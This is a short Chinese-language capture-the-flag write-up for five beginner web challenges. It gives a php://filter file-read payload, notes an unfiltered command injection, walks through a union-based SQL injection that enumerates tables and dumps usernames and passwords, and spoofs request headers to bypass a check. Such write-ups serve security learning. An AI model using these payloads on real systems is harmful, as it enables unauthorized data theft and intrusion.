[极客大挑战 2019] Knife
[ACTF2020 新生赛] Include
[ACTF2020 新生赛] Exec
[极客大挑战 2019] LoveSQL
[极客大挑战 2019] Http
# [极客大挑战 2019] Knife
直接连蚁剑就行。flag 在根目录。
# [ACTF2020 新生赛] Include
进入后看见 tips,直接进行 php 伪协议读文件。
?file=php://filter/read=convert.base64-encode/resource=flag.php
# [ACTF2020 新生赛] Exec
直接就额外命令执行,没有任何过滤
# [极客大挑战 2019] LoveSQL
sql 注入没有任何过滤,直接一套操作。在 GET 方式传入 #要进行 url 编码 %23
/check.php?username=1' union select 1,2,3%23&password=1
位置 2,3 为回显位置。
记住公式,直接套
查数据库:(select database()) 查表:(select group_concat(table_name) from information_schema.tables where table_schema=database()) 查字段:(select group_concat(column_name) from information_schema.columns where table_name='表') 查数据:select 字段 from 表
查数据库
Payload:?username=1' union select null,null,(select database())%23&password=2
查表名
payload:?username=1' union select null,null,(select group_concat(table_name) from information_schema.tables where table_schema='geek')%23&password=2
查字段
Payload:?username=1' union select null,null,( select group_concat( column_name ) from information_schema.columns where table_name='geekuser')%23&password=2
查数据,得到 flag
Payload:?username=1' union select null,null,group_concat(id,0x3a,username,0x3a,password) from geek.l0ve1ysq1%23&password=2
# [极客大挑战 2019] Http
F12 找到 Secret.php
修改几个请求头。
User-Agent: Syclover
referer: https://www.Sycsecret.com
X-Forwarded-For: 127.0.0.1
得到 flag